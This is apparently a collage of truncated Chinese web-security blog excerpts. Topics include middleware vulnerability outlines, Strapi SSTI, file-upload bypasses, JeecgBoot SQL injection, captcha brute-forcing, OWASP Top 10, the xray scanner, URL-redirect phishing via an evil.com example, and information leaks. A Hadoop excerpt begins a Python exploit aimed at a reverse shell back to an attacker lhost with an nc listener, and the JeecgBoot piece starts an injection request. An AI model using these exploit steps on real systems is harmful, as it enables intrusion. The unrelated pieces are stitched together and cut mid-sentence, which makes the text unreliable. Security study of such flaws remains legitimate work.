（一）IIS1、PUT漏洞2、短文件名猜解3、远程代码执行4、解析漏洞（二）Apache1、解析漏洞2、目录遍历（三）Nginx1、文件解析2、目录遍历3、CRLF注入4、目录穿越（四）Tomcat1、远程代码执行2、war后门文件部署（五）jBoss1、反序列化漏洞2、war后门文件部署（六）WebLogic1、反序列化漏洞3、任意文件上传4、war后门文件部署 （一）IIS简介：互联网信息服务（英语：InternetInformationServices,简称IIS），是由微软公司提供的基于运行MicrosoftWindows的互联网基本服务。最初是WindowsNT版本的可选包，随后自带

漏洞描述Strapi是Node.js开发的开源内容管理系统，Users-Permission插件的电子邮件模板系统用于管理与用户权限相关的电子邮件通知(默认启用)。Strapi4.5.6之前版本中，Users-Permission插件的电子邮件模板系统存在SSTI（服务器端模板注入）漏洞，有权访问Strapi管理面板的攻击者可在电子邮件模板分隔符（例如）中插入恶意JavaScript代码，当API账户注册时，系统会加载电子邮件模板发送电子邮件，同时将执行攻击者可控的恶意代码。此漏洞与CVE-2023-22894结合使用可通过劫持管理员帐户，在所有Strapi该漏洞已存在POC。漏洞名称Stra

文件上传绕过在实战中的应用文件上传前端校验绕过黑名单绕过content-type绕过内容绕过截断绕过windows系统下的文件上传中间件apache解析漏洞IIS解析漏洞nginx解析漏洞tomcat特殊上传编辑器上传漏洞文件上传文件上传漏洞是指攻击者通过对被攻击网站的文件上传功能进行利用，上传恶意文件来获得对用户资源和敏感数据的访问权限。攻击者通常会利用弱密码、错误配置等漏洞来上传恶意文件从而执行恶意代码。这些恶意代码可以是木马、病毒、恶意脚本、后门等，这些文件通常被隐藏在网站的文件目录中，从而可以让攻击者在未被发现的情况下长时间控制网站。文件上传漏洞是一种非常危险的安全漏洞，因为攻击者可以

一、漏洞信息JeecgBoot是一款基于BPM的低代码平台！前后端分离架构SpringBoot2.x，SpringCloud，AntDesign&Vue，Mybatis-plus，Shiro，JWT，支持微服务。JeecgBoot qurestSql处存在SQL注入漏洞，攻击者可以从其中获取数据库权限。二、漏洞复现访问路径：/jeecg-boot/jmreport/qurestSql  初步了解，存在这个路径可能会存在sql漏洞抓包把get请求改为post请求：发送payloadPOST/jeecg-boot/jmreport/qurestSqlHTTP/1.1Host:{{Hostname}

 图形验证码---验证码可爆破验证码可爆破，即验证码过于简单，例如验证码中字符数量过少，比如只有四位组成，且只包含0-9的数字还没有干扰点，亦或者验证码可以被猜测到可以使用PKAV来进行验证码的爆破，如织梦系统的后台登录页面图形验证码----验证码复用验证码复用，即登陆失败后验证码不刷新，仍然可以使用上一次登陆时的验证码且有效，存在爆破风险漏洞，如织梦后台的验证码。只要输入账号错误和密码错误回显不一样，就可以算成用户名可爆破漏洞例如：用户名不存在，你的密码错误，这两种回显，说明用户名可爆破图形验证码----验证码绕过验证码绕过，即验证码可以通过逻辑漏洞被绕过通常分为以下情况案例1：验证码验证返

在学习网络安全之前，需要总体了解安全趋势和常见的Web漏洞，在这里我首推了解OWASP，因为它代表着业内Web安全漏洞的趋势；目录一、OWASP简介OWASPTop10:2013版至2017版改变了哪些内容二、OWASPTop10A1:注入漏洞A2:失效的身份认证A3:敏感数据泄露A4:XML外部实体漏洞（XXE）A5:失效的访问控制A6:安全配置错误漏洞A7:跨站脚本漏洞（XSS）A8:不安全的反序列化漏洞A9:使用含有已知漏洞的组件A10:不足的日志记录和监控三、风险因素总结一、OWASP简介OWASP（开放式web应用程序安全项目）关注web应用程序的安全。OWASP这个项目最有名的，也

xray——详细使用说明（一）_萧风的博客-CSDN博客_xray的使用xray——详细使用说明（二）_萧风的博客-CSDN博客一、xray简介xray是一款功能强大的安全评估工具，由多名经验丰富的一线安全从业者呕心打造而成，主要特性有:检测速度快。发包速度快;漏洞检测算法高效。支持范围广。大至OWASPTop10通用漏洞检测，小至各种CMS框架POC，均可以支持。代码质量高。编写代码的人员素质高,通过CodeReview、单元测试、集成测试等多层验证来提高代码可靠性。高级可定制。通过配置文件暴露了引擎的各种参数，通过修改配置文件可以极大的客制化功能。安全无威胁。xray定位为一款安全辅助评估

0x00漏洞描述Hadoop是由Apache基金会所开发的分布式系统基础架构，由于服务器直接开放了Hadoop机器HDFS的50070web端口及部分默认服务端口，黑客可通过执行EXP，反弹shell，nc监听。0x01漏洞复现1.编写exp#!/usr/bin/envpythonimportrequestsimportsystarget='http://target-ip:8088/'//target-ip替换为目标iplhost='your-ip'#putyourlocalhostiphere,andlistenatport2334url=target+'ws/v1/cluster/app

URL跳转漏洞（URL重定向漏洞），跳转漏洞一般用于钓鱼攻击。https://link.zhihu.com/?target=https://edu.lagou.com/原理：        URL跳转漏洞本质上是利用Web应用中带有重定向功能的业务，将用户从一个网站重定向到另一个网站。其最简单的利用方式为诱导用户访问http://www.aaa.com?returnUrl=http://www.evil.com，借助www.aaa.com让用户访问www.evil.com，这种漏洞被利用了对用户和公司都是一种损失。1、使用场景（1）登录功能一直是URL跳转漏洞的重灾区，用户访问网站某个业务，当

文章目录前言一、信息泄露1.信息泄露漏洞原理1.1信息泄露漏洞介绍1.2信息泄露漏洞类型与危害1.3信息泄露漏洞修复建议2.信息泄露漏洞挖掘实战2.1案例一2.2案例二3.CNVD原创证书示例前言信息泄露漏洞指的是企业或组织在处理和管理敏感信息时存在的缺陷或漏洞，可能导致敏感信息被未经授权的第三方获取或泄露。渗透步骤通常包括以下几个步骤：1.信息收集：收集目标企业或组织的关键信息，包括IP地址、域名、子域名、网络拓扑等信息。2.漏洞扫描：对目标企业或组织进行主机扫描、端口扫描、服务扫描等，确定可能存在的漏洞。3.获取权限：使用漏洞利用或社会工程等方法获取目标系统或应用的管理员或用户权限。4.维